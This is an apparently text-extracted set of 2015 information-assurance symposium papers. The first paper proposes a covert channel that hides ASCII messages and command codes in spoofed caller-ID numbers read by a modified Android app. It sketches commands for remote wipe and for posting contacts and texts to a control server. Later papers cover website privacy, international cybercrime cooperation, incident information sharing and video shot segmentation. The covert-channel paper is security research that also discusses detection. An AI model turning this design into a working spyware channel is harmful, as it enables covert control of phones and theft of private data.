Keywords—Covert channel; Public Switched Telephone Net-work; Dial plan; Android; Phone number

I. INTRODUCTION

The public switched telephone network “refers to theworldwide voice telephone network accessible to all thosewith telephones and access privileges,” as defined by Newton[15]. A dial plan (also commonly referred to as a numberingplan) is “a numbering scheme used in telecommunications toallocate telephone number ranges to countries, regions, areas,and exchanges, and to nonfixed telephone networks such asmobile phone networks.” [17]. This is essential for call routingand is the central component of how phone numbers areallocated to different regions. By taking a subset of a dialplan, and converting the numeric values to ASCII characters;it is possible to embed hidden messages from a spoofed callingsource number.

A. Legality

In the United States, the Truth in Caller ID Act of 2009prohibits caller ID spoofing if the caller has “the intent todefraud, cause harm, or wrongfully obtain anything of value.”[2]. However, during the development of this channel, therewere no malicious intents as the tests during development wereutilizing the authors’ own devices.

B. North American Numbering Plan

The ITU E.164 recommendation [10] reserves multiplecountry codes such as 0 and 999. There should be no validphone call from a phone number beginning with values suchas these since they are “reserved for future use.” [10]. Due to

this, a covert channel can be created by taking advantage of theworldwide public switched telephone network dial plan. Forthe purposes of simplicity in order to elaborate on proposedmethods of extensibility, this covert channel will follow thestandards set forth by the North American Numbering PlanAdministration to adhere to one format as opposed to attempt-ing to combine multiple regional dial plans, which may differ.

All phone numbers with the assigned country code of 1fall under the authority of the North American NumberingPlan Administration [3]. NANPA further breaks down 10 digitphone numbers by a 3-digit Numbering Plan Area (NPA)commonly referred to as the area code followed by a 7-digitlocal number. The format of phone numbers that fall withinthe authority of NANPA is NXX-NXX-XXXX where N is anydigit 2-9 and X is any digit 0-9 [3].

C. Define Covert Channel

Although the field of covert channels is in an embryonicstage, there have been multiple proposed definitions for covertchannels. In 1973, Butler Lampson introduced the concept ofa covert channel and describes it as “[a channel] not intendedfor information transfer at all.” [11]. Gligor reenforced thisdefinition by describing covert channels as, “[a] communica-tion channel that allows a process to transfer information in amanner that violates the system’s security policy.” [8]. Covertchannels have been broken down into three categories: stor-age, timing, and behavioral-based channels [5]. The channelproposed in this paper can be classified as a storage channel.Millen explains that, “Research in covert channels split upinto four disciplines: explaining them, finding them, measuringthem, and mitigating them.” [13]. Further analysis can beperformed on the following three factors: detection, mitigation,measuring. Considering that the proposed channel has beenexplained, the remaining three categories will be discussedfurther.

D. Detection and Mitigation

This covert channel can be mitigated and potentially pre-vented at the network layer where the backbone infrastructureof the PSTN can examine the source phone number of a call.If the number is reserved in accordance with the ITU E.164recommendations, then the call can be blocked and dropped.However, this can reduce system performance of the PSTNbelow acceptable levels since every call would be examinedfor potentially spoofed numbers.

10th ANNUAL SYMPOSIUM ON INFORMATION ASSURANCE (ASIA '15), JUNE 2-3, 2015, ALBANY, NY

ASIA '15 24

Additionally, it is possible for a transcription of all callsmade to or from a mobile device to be obtained from a wirelessprovider. Excessive calling in a short period of time could raisesuspicion.

E. Measuring Throughput and Robustness

When discussing covert channels, it is important to recog-nize the throughput and robustness of the channel. Throughputis defined as “the amount of data the channel is able to transmitover a given period of time,” [7] and robustness is defined as“the survivability of a given channel.” [7].

The channel can send three ASCII characters through thefirst six digits of the local number. Although there are 127ASCII values, the printable characters have decimal valuesbetween 32 and 127 [4]. This leaves 95 characters that can besent. Since 95 is only two digits, each character in the secretmessage will only require two digits. Thus, three characters canbe sent with each call. This can be accomplished by takingthe ASCII value of the character being sent, subtracting 32,sending the message, and then adding 32 back on the otherend to determine the original value. For example, the decimalvalue for a capital A using ASCII encoding is 65. Subtracting32 will result in 33. A phone call from the source address of999-200-3333335 will send “AAA” since the receiving devicewill add 32 to 33 resulting in 65, which is the original messagebeing sent. Further functionality will be discussed later in thispaper.

The formula for encoding the data on the sending deviceis as follows:

M = p− 32

where M is the actual message (the digits) being sent and p isthe ASCII value of the plaintext character. The receiving devicecalculates the following formula to determine the originalmessage sent:

p = M + 32

This covert channel is highly robust since the PSTN is acore part of the world’s critical infrastructure, and it is notlikely to be removed or shut down.

F. Extensibility

The proposed method of extensibility uses the area codeof a phone number as a pre-shared secret codebook to senda command code to the device. This code can represent acommand that tells the device what information the senderis looking for. For example, code 200 may tell the device tosend data via an HTTP POST request to a web server. TheURL of the web server may be a pre-shared secret or it canbe conveyed in the data portion of the number. The formercan potentially become a single point of failure because if adomain name becomes blacklisted, the phone will not be ableto communicate with that server. However, if the domain canbe conveyed in a secret message to the phone, this will allowfor more flexibility with having a command and control serverfor relaying data back to.

If a device receives a phone call from a number beginningwith a reserved value, it should examine the following digitsthat may contain a hidden message. This phone call should

be intercepted and terminated before being passed to theapplication that receives calls.

II. GENERAL PROCEDURE

The proposed channel will adhere to the standard cre-ated by the North American Numbering Plan Administration.This means that following the country code is a three digitNumbering Plan Area (NPA) followed by a seven digit localnumber. The following example is a general method intendingto serve as an outline for potential methods to implementa covert channel based on the Public Switched TelephoneNetwork dial plan. An example phone number for this channelis 999-200-3333335. Upon examining a phone number, threefields initially stick out: the country code (one to three digits),the area code (three digits, according to NANPA’s standard),and the local number (seven digits, according to NANPA’sstandard). This channel breaks up the local number into twoparts - the first six digits, and the last digit.

Value Purpose999 Country Code200 Area Code333333 First six digits of local number5 Last digit of the local number

This channel uses each of the three fields for a differentpurpose. The purpose for each is as follows:

• Country code - In this channel, the country codeserves as the delimiter indicating whether there is ahidden message contained in the digits following. Theapplication residing on the mobile device looks forspecified reserved country codes or spare codes. Forexample, country codes 0 and 999 are both reserved,and codes such as 280, 424, and 890 are all “sparecodes.” [10]

• Area code - The intention of this field is to providethe opportunity for the user to send “command codes”to the mobile device. This will provide a feature forextensibility and create the opportunity to develop aframework for users to develop their own commands.

• First six digits of the local number - The first sixdigits of the local number are used for sending theactual covert message using ASCII encoding.

• Last digit of the local number - This value is usedin a method similar to the More Fragment IP header.

The country code is used as a delimiter because it willlook for phone calls from specified reserved country codeswithout service as a denial of service to legitimate phone calls(since it would not pass them up to the dialer). The ITU E.164recommendation can be examined to determine a country codeto use.

A. Potential Command Codes

1) Remote Wipe: A remote wipe functionality could havemultiple implications. There are currently some commercialsolutions available to remotely wipe a device [12], but a remotewipe functionality of this channel could prove to be useful forwiping sensitive data off of a device if it is misplaced or stolen.

10th ANNUAL SYMPOSIUM ON INFORMATION ASSURANCE (ASIA '15), JUNE 2-3, 2015, ALBANY, NY

ASIA '15 25

2) HTTP POST: The application can be configured to senda POST request to a specific server containing informationsuch as applications installed, a list of contacts, or contents oftext messages.

B. “More Fragments”

According to RFC 791 [6], the “More Fragments” (MF)flag in the Internet Protocol header is used to indicate “data-gram is not the last fragment.” Similar to the MF flag in theIP header, the last digit in the seven digit local number servesto indicate the end of the transmission of a covert message.The value will be a predetermined set of values to allowthe sender to inform the receiver when the message is donetransmitting. Instead of relying on just one value to indicatewhether the message is done or if there is still more to come,there should be multiple values in order to increase the varietyof phone numbers calling. This will increase the covertnessof the channel since there will be less of a pattern of phonenumbers to decrease the detectability. For example, all evennumbers could indicate the end of the transmission and allodd numbers could indicate that there are still more parts ofthe message that the receiver should wait for.

III. PROOF OF CONCEPT

A. Android Application

An Open Source Android application titled ‘Call Code’[14] was originally designed as a tutorial for developers todetect incoming and going calls. By modifying the source codeof ”Call Code” [14], it was trivial to derive the last seven digitsof a incoming caller’s number (with the first 6 containing thesecret message). The application is given a higher priority forchanges to the phone state by declaring a higher integer valuefor an intent filter in the application’s manifest file. An intentis “an abstract description of an operation to be performed,”[1] which can include launching applications. This allows theapplication first access to execution upon any change to theAndroid phone’s state, including incoming and outgoing calls.When a call is detected, the application segments the phonenumber into “chunks.” These “chunks” contain a country code,area code, city code and six unique digits where our ASCIImessage is derived. After the number is obtained, if it matchesa pre-defined reserved country code value of 999, the call isdropped never making it to the phone’s dialer application. Theuse of the reserved country code 999 is made possible throughthird party services that allow spoofing of phone calls. Duringtesting, the Android application “Mask My Number” [18] wasused. The first six of the last seven digits of the incomingnumber are then segmented into three, two digit values thatare converted to their ASCII representation via the methoddescribed in the introduction. In the source of the application,a hash table is constructed with numeric values associatingwith alphabetic characters. If the incoming number contains apair of digits that do not have a corresponding value in thehash table, they are replaced with a null value. If successful,the character is then written to a file on the external storageof the Android phone.

B. Forensic Analysis

Considering the method described, if forensic analysis ofthe device is performed, the text file can be discovered - even

if it is deleted [9]. Upon examining call logs, the spoofednumber is logged; there is no trace of the number of theoriginal caller. This is beneficial because the sender can remainanonymous. However, should the channel be discovered, theinformation being relayed can be easily discovered if someoneperforming the forensic analysis is able to aggregate all of thespoofed phone numbers and parse out the digits containing themessage.

IV. FUTURE WORK

OpenBTS is “an open source software project dedicatedto revolutionizing mobile networks by substituting legacytelco protocols, and traditionally complex, proprietary hard-ware systems with Internet Protocol and a flexible softwarearchitecture.” [16]. Potential future work includes determiningwhether spoofed phone numbers are logged at the base stationas the actual originating source number or whether they arelogged as the spoofed number. As noted previously there arepros and cons for both options. If the legitimate number islogged, there will be a lot of short phone calls logged betweenthe two devices, which may raise suspicion. However, if thespoofed phone number is logged, it would be possible forsomeone with access to the logs to reconstruct the messageif the person is able to determine the encoding scheme beingused. A spoofed phone number may also stick out more if thereare logs that say there is a number that has an unused countrycode (such as 999). By simulating a base station utilizing theOpenBTS software, it would be possible to test this.

Another method which could potentially send more infor-mation to a mobile device would be to treat the listeningapplication as a call center application. This would allow acaller to send a message by pressing buttons similar to pressingbuttons at a menu before waiting to speak with a representativefor a company. This would allow an established connection tobe able to send more data at a single point in time. However,a drawback of this is that it would most likely cause a denialof service to the phone since it would not be able to receivephone calls while that application is listening and connectedwith another caller.

V. CONCLUSION

This paper examines the North American Numbering PlanAdministration’s dial plan format and proposes a covert chan-nel based on the source phone number of a call. Although theNANPA standard is used in this example, the covert channelcan be extended to use dial plan formats of other regions. Bywaiting for a phone call from a number with a specified valuein the country code as the delimiter to indicate the start ofa message, an application listening on the receiving devicecan parse the number of the incoming call and determine thecorresponding ASCII characters for the expected message.

REFERENCES

[1] Intent. Online. [Online. http://developer.android.com/reference/android/content/Intent.html].

[2] Truth in caller id act of 2009. Online. [Online. http://www.gpo.gov/fdsys/pkg/BILLS-111s30enr/pdf/BILLS-111s30enr.pdf].

[3] North American Numbering Plan Administration. About the NorthAmerican Numbering Plan, 2014. [Online. Accessed 20-October-2014].

10th ANNUAL SYMPOSIUM ON INFORMATION ASSURANCE (ASIA '15), JUNE 2-3, 2015, ALBANY, NY

ASIA '15 26

[4] American Standards Association. American Standard Code for Infor-mation Interchange, June 1963. [Online. Accessed 19-October-2014].

[5] Daryl Johnson, Bo Yuan, Peter Lutz. Behavior-Based Covert Channelin Cyberspace. pages 311–318, June 2009.

[6] Defense Advanced Research Projects Agency Information ProcessingTechniques Office, 1400 Wilson Boulevard Arlington, VA 22209. RFC791 - Internet Protocol - DARPA Internet Program Protocol Specifica-tion, September 1981.

[7] Erik Brown, Bo Yuan, Daryl Johnson, Peter Lutz. Covert channelsin the HTTP network protocol: Channel characterization and detectingMan-in-the-Middle attacks. In The Proceedings of the 5th InternationalConference on Information Warfare and Security. The Air Force Insti-tute of Technology, Academic Conferences Limited, April 2010.

[8] Virgil D Gligor. A guide to understanding covert channel analysis oftrusted systems. The Center, 1994.

[9] Jaromir Horejsi. Android forensics, part 1: How we recov-ered (supposedly) erased data. https://blog.avast.com/2014/07/09/android-foreniscs-pt-2-how-we-recovered-erased-data/, 2014.

[10] International Telecommunication Union. List of ITU-T Recommen-dation E.164 Assigned Country Codes, November 2011. [Online.Accessed 13-October-2014].

[11] Butler W. Lampson. A note on the confinement problem. Commun.ACM, 16(10):613–615, October 1973.

[12] McAfee. Security for Military-Grade Google Android De-vices. [Online. http://www.mcafee.com/us/resources/solution-briefs/sb-security-military-grade-android.pdf].

[13] Jonathan Millen. 20 Years of Covert Channel Modeling and Analysis.Computer Science Laboratory, SRI International, May 1999.

[14] Andrew Moskvichev. Detecting incoming and outgo-ing phone calls on android. Online, March 2013.[Online. http://www.codeproject.com/Articles/548416/Detecting-incoming-and-outgoing-phone-calls-on-And].

[15] Harry Newton. Newton’s Telecom Dictionary, page 578. FlatironPublishing, March 1998.

[16] OpenBTS.org. A platform for innovation. Online. [Online. http://openbts.org/].

[17] Kevin Wallace. Implementing Cisco Unified Communications Voice overIP and QoS (Cvoice) Foundation Learning Guide: (CCNP Voice CVoice642-437), 4th Edition, chapter 4. Cisco Press, May 2011.

[18] Zantive. Mask my number. Online. [Online. https://play.google.com/store/apps/details?id=app.maskmynumber.com&hl=en].

10th ANNUAL SYMPOSIUM ON INFORMATION ASSURANCE (ASIA '15), JUNE 2-3, 2015, ALBANY, NY

ASIA '15 27

International Cooperation to Enhance

Website Security

Manmohan Chaturvedi

Director, Curriculum and Pedagogy

CISO Academy

Gurgaon, India

[email protected]

Srishti Gupta MS, Software Engineering

VIT University

Chennai, India

[email protected]

Abstract—Websites are critical for any organization whether

in public or private domain to reach out to the consumers of e-

governance or e-commerce. The privacy of the consumer data

and security of the online transaction has been an area of

concern. Web based attacks and web application attacks are on

the rise. In this paper we analyze the international context and

options to minimize cybercrime.

Keywords—Website security, Secure online transactions,

Privacy & security of consumer data, International cooperation

I. INTRODUCTION

Digital infrastructure is the substrate of the modern society. The networked society would achieve the potential efficiency gains only if this infrastructure is reliable and secure. As the internet and web technologies have advanced from the pure information-sharing phase to interactive, transactional, and intelligent or integration phases, many states and nations, like business corporations, see opportunities of offering web-based government (e-government) services for improving government efficiency, transparency, and competitiveness in the global economy [1].

The sharp uptake of e-government services on the internet has also brought with it security threats. Certain government websites have been observed to post citizens' names, social security numbers, property tax records, or other private information on the web without requiring user login ID and password. Cyber attackers have matured from nuisance and destructive attacks towards activities motivated by financial gains.

II. WEB BASED THREATS TO THE PRIVACY AND SECURITY OF

USER DATA

A. Privacy Policy

In the current times when there are growing discussions globally regarding the privacy of users and safety of his/her details, it is important to have a privacy policy in place so as to make the citizen user confident about the safety of his/her personal information as well as keep informed about the conditions when such information can be shared with the relevant authorities.

A privacy policy is a statement or a legal document (privacy law) that discloses some or all of the ways a party gathers, uses, discloses and manages a customer or client's

data. Personal information can be anything that can be used to identify an individual, not limited to but including; name, address, date of birth, marital status, contact information, ID issue and expiry date, financial records, credit information, medical history, where one travels, and intentions to acquire goods and services. In the case of a business, it is often a statement that declares a party's policy on how it collects, stores, and releases personal information it collects. It informs the client what specific information is collected, and whether it is kept confidential, shared with partners, or sold to other firms or enterprises.

Privacy policy is important to the modern state, because grounded in it is the individual's physical and moral autonomy. For this reason, it is worthy of constitutional protection. The exact contents of a privacy policy will depend upon the applicable law and may need to address requirements across geographical boundaries and legal jurisdictions. Most countries have their own legislation and guidelines of who is covered, what information can be collected, and what it can be used for.

In general, a privacy policy is a statement of several paragraphs long explaining to the site users and customers exactly how their information will be used. It also details what information is tracked and how it is tabulated. In today's world of trying to be anonymous and expecting privacy from outsiders, the privacy policy is that much more important to many website users and online customers.

One of the main reasons a website needs a privacy policy page is to disclose the owner's intent. People have a right to know what information is being traced behind the scenes, and what the owner plans to do with that private information. For example, does the site owner collect IP addresses to establish a database of user habits to sell to other organizations? Does the site owner request addresses with the express purpose of selling the list, or are the email address provided for a legitimate purpose, such as sending existing customers relevant information about product issues and upgrades?

Policy statement pages are particularly useful and are actually required by law in many jurisdictions for sites that operate businesses for catalogues and online shopping. Users must be made aware that when they purchase goods and services, that their purchases are conducted in a secure and safe environment. Further, they must be assured that their personal data such as home addresses, telephone numbers, and credit card information will not be used in any way other than to ship

10th ANNUAL SYMPOSIUM ON INFORMATION ASSURANCE (ASIA '15), JUNE 2-3, 2015, ALBANY, NY

ASIA '15 28

goods and bill for the products. Companies are not permitted to sell private information and must always disclose any mailing lists upon which customers will be placed as a result of purchasing.

Another reason for a policy statement is to notify users that some pages may take them away from the existing website. If users choose to follow links to other resources or to outside sales pages, then they must understand that the privacy policy from the original site is no longer in force, and that they should read the terms of use of the website where they landed. In addition, users should know that any banners or third party advertisements will take them away from the originating site.

Today, one of the biggest reasons for a policy statement is to acknowledge to users the fact that either the website owner or third party advertisers may drop cookies, which may track information about the users' online habits. For many online businesses, cookies serve a legitimate purpose in that they save users time from logging into sites every time they visit them, and cookies allow information about their accounts to be stored for easy access. But, some advertising companies want to know more about the users. Either way, the use of cookies must be disclosed and the reason for the cookies must be apparent.

Finally, policy statements are mandated by some companies with which the website owner does business. Because privacy is a sensitive issue for many people, often companies will not do business with those that try to hide behind the cloak of the internet. Examples are affiliate programs. The program managers want to be sure that the affiliates are doing business in an open and honest environment. They do not want their customers deceived, and they do not want their reputations degraded. In order for affiliates to participate in certain programs, they must be upfront about the third party ads and the possible existence of cookies. They must explain that the cookies may track web traffic in an attempt to offer targeted advertisements to certain individuals. As a result, the users must have the option to decline the use of cookies, and may opt out of the activity altogether.

Government websites need to follow an extremely cautious approach when it comes to collecting personal details/information about the visitors to the sites. Website should solicit only that information which is absolutely necessary. As per many government guidelines, in case a Department solicits or collects personal information from visitors through their websites, it MUST incorporate a prominently displayed Privacy Statement clearly stating the purpose for which information is being collected, whether the information shall be disclosed to anyone for any purpose and to whom. Further, the privacy statement should also clarify whether any cookies shall be transferred onto the visitor’s system during the process and what shall be the purpose of the same.

B. Certificate for Website Security

In this era of cyber crimes and cyber threat it is very important to have certain procedures in place which are acknowledged by renowned certifying agencies. They are required to get audited by agencies empanelled by a government agency. Indian government guideline to Indian government websites enumerates that if a Department’s

website allows e-Commerce and collects high risk personal information from its visitors such as credit card or bank details, it MUST be done through sufficiently secure means to avoid any inconvenience. SSL (Secure Socket Layer), Digital Certificates are some of the instruments, which could be used to achieve this.

Web Application security is of paramount concern to owners as well as consumers of the website. A lot of security threats are handled at data centres and server administrator level where the application is hosted. Application developers should however be sensitive about security aspects, as a lot of security threats arise due to vulnerability of application software code. These application driven attacks sometimes turn out to be quite fatal. Best Practices to follow while developing web applications using various technologies are available on CERT-IN website as well as in internet space . Some of the key features of the NIC guidelines include: security audit from empanelled agencies for each website/application; formulation of a security policy by Department to address various security risks/threats; etc.

III. INTERNATIONAL EFFORT TO CONTAIN CYBER CRIME

The past two decades has witnessed a number of initiatives by international bodies like; the Organization for Economic Cooperation and Development (OECD), Council of Europe (COE), G-8, European Union, United Nations [2], and the Interpol, which recognized the inherent cross border reaches of cybercrime, the limitations of unilateral approaches, and the need for international harmony in legal, technical, and other areas [3].

IV. CHALLENGES OF SECURITY IN CYBERSPACE

According to [4] the security issues raised by cyberspace pose special challenges to those wishing to bring it into a classic international security framework. These special features pertain to four aspects viz. actors, attribution, authority and activity.

A. Actors

A key challenge of cyberspace is that it is populated by both state and non-state actors. An additional problem is that these two categories of users are not readily identifiable. It is for the sovereign states to ensure that non-state actors within their jurisdiction respect the law, including international legal obligations that have been incorporated into national law. The cyber criminals or terrorists residing in a country A and targeting victims in another country B while insulated from direct action of law enforcement agencies of country B are still the responsibility of the country A in terms of any collaborative treaties signed between the two countries. To achieve effective implementation very close, proactive and flexible interaction between law enforcement agencies of the two signatories is essential. The matrix becomes more involved when the number of member states increases and the eco-system should evolve to bring in transparency amongst all stakeholders.

B. Attribution

The verification tools of the International Monitoring

System of the Comprehensive Test Ban Treaty Organization

10th ANNUAL SYMPOSIUM ON INFORMATION ASSURANCE (ASIA '15), JUNE 2-3, 2015, ALBANY, NY

ASIA '15 29

(CTBTO) were easily able to detect the nuclear tests by North

Korea in 2006 and 2009[5] and led to necessary international

response. In cyberspace, however, a cyber attacker can hide

himself readily, and even disguise his attack to appear to

originate from a third party. The problem of attribution for a

cyber-action is clearly one that will complicate any effort at

security controls. Uncertainty about attribution will also

constrain retaliatory action. The current level of research in

reliable attribution is not adequate. The cyber crime treaties

cannot be implemented unless trust exists between signatories

that best efforts are being put to identify the criminals and

therefore, transparency is first precondition for success.

C. Authority

The designation of a state agency that would lead the

response to an international cyber-attack would depend on the

nature of the attack. The vast majority of hostile cyber-activity

originates with criminal elements, for which law enforcement

agencies are normally responsible. A response to use of the

Internet by terrorists might entail pooling resources from both

the national security and law enforcement communities. The

fact that hostile international cyber-activity is not exclusively

or even predominantly a national security phenomenon adds a

further complication to the development of internationally

acceptable approaches for regulating or policing such activity.

International collaborative initiative for countering cyber-

crime; the 2001 Budapest Convention on Cybercrime by the

Council of Europe has run into road blocks in absence of

mutual trust and attempts to erect barriers to the operational

procedures (remote log in to the suspected computer

systems)considered crucial for timely collection of the

evidence, which is in any case very fragile.

D. Activity

Hostile international cyber-activity, as already noted, can be perpetrated by state or non-state actors. Within state actors too, the military and intelligence arms of nation states operate under different norms. Intelligence agencies of all countries with means and capacity will keep tabs on adversaries and on activities they perceive as threats. No international agreement or legislation will change that. When such attempts to spy are exposed, as by Snowden, there will be a degree of furor and then it will be business-as-usual [5].

V. THE POSSIBLE OPTIONS

A. Necessity for a review of the cyber space use

Considering the above four special feature of cyber domain that seem to discourage international treaties to combat cyber crime and terrorism, we conclude that bilateral and multilateral trust and transparency amongst signatories is a precondition for success. All nations have to realize that dual use of cyber space for commercial and military use is fraught with unacceptable risks. If we look at the international treaties[4]for Nuclear Weapons, Chemical Weapons Convention, Biological and Toxin Weapons Convention, Outer Space Treaty of 1967 prohibiting the placement of weapons of mass destruction in outer space and the militarization of the Moon and other celestial bodies and more recently, the Ottawa and Oslo treaties banning anti-personnel landmines and cluster munitions respectively, as precedence, there is hope for international

cooperation in cyber space. The efficiency gains provided by the cyber domain are very valuable for mankind and using them for mutual destruction would be a serious folly.

Once all nation states share this common perception, combating cyber crime and terror would not be an impossible mission. The Budapest Convention(Council of Europe (COE) convention on cyber crime- 2001) was a good attempt to seek international cooperation to harmonize the law enforcement efforts of all nations against cyber crime. However, lack of trust and international political compulsions to use the cyber domain for projecting the state power have sabotaged this potential collective action against cyber crime. With the development of new technologies such as cloud computing, “smart” phones and social media, as well as the emergence of botnets and the expansion of encryption, the Budapest Convention requires updating [6] before being ratified by all nations.

We need to realize that the state actors particularly militaries and intelligence agencies would certainly be using the ICT networking technologies for achieving the efficiency gains in their core activities. It is important that their ICT networking infrastructure is protected from; non-state actors viz. criminals/ terrorists and competing state actors viz. militaries and intelligence agencies. Use of the commercial internet technologies for such segment is fraught with risk and therefore, there is a case to evolve hardened systems for such niche groups.

B. Role of deterrence in combating cyber crime and terrorism

Deterrence theory can be applied to all cyber crimes including cyber terrorism [7] [8]. The impact of deterrence (deterrence effect) is positively correlated with the identification probability, and it also may be positively correlated with punishment level. Keeping the potential punishment severity unchanged, the deterrence effect will be determined by the identification probability. The identification probability depends upon the capability to track cyber terrorists[9]. Thus, to increase the impact of deterrence on cyber terrorism, the identification probability must be increased. An inability to track cyber terrorists would make it difficult for local and international jurisdictions to track the entire network of cyber terrorists as well as to prosecute them due to the lack of proof of identification of these cyber terrorists. The potential adoption of a new variant of Cyber Crime and Terrorism convention by all nations would provide the eco-system that may put the criminals and terrorists under pressure and increases the success probabilities of the international law enforcement agencies.

VI. CONCLUSION REMARKS

This paper has attempted to unveil the underlying reasons for the rising cybercrime. Race for dominance has prevented the nation states to see the logic of unrestricted international collaboration to combat Cyber crime and terrorism. The peaceful use of cyber domain for the good of mankind offers unimagined opportunities. The common enemies for all nation states are cyber criminals and terrorists. The collaboration with adequate trust and unrestricted access to the law enforcement agencies across the national boundaries would certainly mitigate this transnational menace.

10th ANNUAL SYMPOSIUM ON INFORMATION ASSURANCE (ASIA '15), JUNE 2-3, 2015, ALBANY, NY

ASIA '15 30

REFERENCES

[1] J.J. Zhao, S.Y. Zhao, “Opportunities and threats: A security assessment

of state e-government websites “Government Information Quarterly 27

49–56, 2010.

[2] United Nations, International review of criminal policy: United Nations

manual on the prevention and control of computer-related crime.

CNET.com, 1994.

[3] N. Choucri, S. Madnick and J. Ferwerda, “Institutions for Cyber

Security: International Responses and Global Imperatives”, Information

Technology for Development, 2013, DOI:

10.1080/02681102.2013.836699

[4] P. Meyer, “Cyber-Security through Arms Control”, the RUSI Journal,

156:2, 22-27, 2011. DOI:10.1080/03071847.2011.576471

[5] S. Saran, “Internet realpolitik” ORF Cyber Monitor, Volume II, Issue 3,

March 2014.

[6] R. Broadhurst and L. Y. C. Chang, “Cybercrime in Asia: Trends and

Challenges”, In J. Liu et al. (eds.), Handbook of Asian Criminology,

DOI 10.1007/978-1-4614-5218-8_4, Springer Science+Business Media

New York 2013.

[7] J. Ginges, “Deterring the terrorist: A psychological evaluation of

different strategies for deterring terrorism”, Terrorism and Political

Violence, 9(1), 170–185, 1997.

[8] M. P. C. Carns, “Reopening the deterrence debate: Thinking about a

peaceful and prosperous tomorrow”. Small Wars & Insurgencies, 11(2),

7–16, 2001.

[9] J. Hua and S. Bapna, “How Can We Deter Cyber Terrorism?

Information Security Journal: A Global Perspective, 21:2, 102-114,

2012. DOI: 10.1080/19393555.2011.647250

10th ANNUAL SYMPOSIUM ON INFORMATION ASSURANCE (ASIA '15), JUNE 2-3, 2015, ALBANY, NY

ASIA '15 31

Information Sharing to Manage Cyber Incidents:

Deluged with Data Yet Starving for

Timely Critical Data

Sanjay Goel School of Business

University at Albany, SUNY

Albany, New York

Charles Barry National Defense University

Washington, DC

YBER security incidents that degrade user security and access to the Internet are often international in nature, simply

because of the distributed borderless nature of Internet traffic flows. Effective incident response management involves

detection of the breach, blocking the perpetrators from damage or theft, and identifying those responsible for prosecution.

Defense against cyber threats requires the ability not only to detect breaches, but also to contain them quickly and remedy the

vulnerabilities that were exploited. The robust exchange of threat and vulnerability information across organizations can

improve collective national security. Development of situational awareness capability during incidents requires the collection

of data from log files, both on the victim organization’s and the attackers’ servers, through Internet Service Providers that may

not even be in the same country. Sharing of relevant data among responders is important both for broad participation and

timeliness. No less important is close cooperation among public and private-sector actors; those essential to successful

response, but also those who may become the future victims of cyber incidents, both systemic and malicious. Success means

ameliorating the effects of causal factors as rapidly as possible, and restoring critical systems to full operation. Information

sharing is a monumental task encumbered by administrative morass, and, often by our inability to pinpoint the precise data

needed.

This paper explores the current methods of international information sharing across both private and public-sector

organizations. It examines what information is critical to be shared initially, and then on a continuing basis during incident

response. The paper provides a critical assessment of the hurdles still to be overcome before broad and timely sharing of

information can become a reality. Finally, it offers options for improving the identification of what characterizes essential data

within the overwhelming data volume of the Internet, and methods for sharing such data among responders. The salient

conclusions are that: cooperation in cyber incident response, while well recognized, is in its infancy in terms of identification of

critical data to be shared; effective information sharing is the rare exception rather than a well-established practice; and the

primary hurdles remaining are human factors not technological inadequacy. The long-term strategy for information sharing

requires streamlining the administrative process, standardizing formats for data exchange, and creating specific data collection

requirements for organizations as well as Internet operators. The paper concludes with recommendations for future of

information sharing among organizations.

The full version will be made available online through the ASIA website at: http://www.albany.edu/iasymposium

C

10th ANNUAL SYMPOSIUM ON INFORMATION ASSURANCE (ASIA '15), JUNE 2-3, 2015, ALBANY, NY

ASIA '15 32

Whose Job is it to Solve the Cybersecurity Problem?

Bruce McConnell Senior Vice President of the EastWest Institute

OST organizations believe that in cyberspace, offense wins, and that cyber defenders are doomed to remain forever in

reactive mode. While everyone says "cybersecurity is a shared responsibility," the roles of individuals, the larger

community, and governments are not agreed. How do we get out of this hole?

BIOGRAPHY

Bruce McConnell leads EWI's relationship-building with government and businesses around the world. He also manages the

institute's Cooperation in Cyberspace Initiative.

Beginning in 2009, McConnell was a leader of the cybersecurity mission at the U.S. Department of Homeland Security. He

became Deputy under Secretary for Cybersecurity in 2013, and responsible for ensuring the cybersecurity of all federal civilian

agencies and for helping the owners and operators of the most critical U.S. infrastructure protect themselves from growing

cyber threats. During his tenure, McConnell was instrumental in building the national and international credibility of DHS as a

trustworthy partner that relies on transparency and collaboration to protect privacy and enhance security.

Before DHS, McConnell served on the Obama-Biden Presidential Transition Team, working on open government and

technology issues. From 2000-2008 he created, built, and sold McConnell International and Government Futures,

consultancies that provided strategic and tactical advice to clients in technology, business and government markets. From

2005-2008, he served on the Commission on Cybersecurity for the 44th Presidency.

From 1999-2000, McConnell was Director of the International Y2K Cooperation Center, sponsored by the United Nations

and the World Bank, where he coordinated regional and global preparations of governments and critical private sector

organizations to successfully defeat the Y2K bug. McConnell was Chief of Information Policy and Technology in the U.S.

Office of Management and Budget from 1993-1999.

McConnell is also a senior advisor at the Center for Strategic and International Studies. He received a Master of Public

Administration from the Evans School for Public Policy at the University of Washington, where he maintains a faculty

affiliation, and a Bachelor of Sciences from Stanford University.

M

10th ANNUAL SYMPOSIUM ON INFORMATION ASSURANCE (ASIA '15), JUNE 2-3, 2015, ALBANY, NY

ASIA '15 33

Shot Segmentation and Grouping for PTZ CameraVideos

Andrew Pulver1, Ming-Ching Chang2, and Siwei Lyu11Computer Science Department, University at Albany, State University of New York

2GE Global Research, Niskayuna, NYEmail: {apulver, slyu}@albany.edu, [email protected]

Abstract—We present a method for detecting shot boundariesand grouping together shots that were taken from identicalcamera directions. The technique utilizes methods includingspectral clustering and phase correlation to achieve fast andaccurate segmentation and grouping.

Keywords—Shot Segmentation, Shot Boundary Detection, ShotGrouping, Cut Detection

I. INTRODUCTION

The exact definition of a shot varies, but it is roughlydefined as an uninterrupted sequence of frames that have beentaken from one camera [10], [9]. We examine videos takenfrom PTZ (pan, tilt, zoom) security cameras. A PTZ cameramay be programmed to automatically transition between a setof directions. The resulting video would consist of many shots,each of which correspond to a period of time where the camerawas not moving. We define a scene as a group of shots takenfrom the same camera direction and thus having the samebackground. Organizing these videos into scenes can be usefulas a preprocessing step for video summarization techniquessuch as video synopsis [6], which requires a fixed background.

II. RELATED WORKS

Many methods exist for shot boundary detection. A recentsurvey lists a large collection of these techniques [8]. Twomethods noted in the survey to perform well are phase-correlation [9] and background tracking [5]. We combine aphase-correlation based approach with background-tracking.

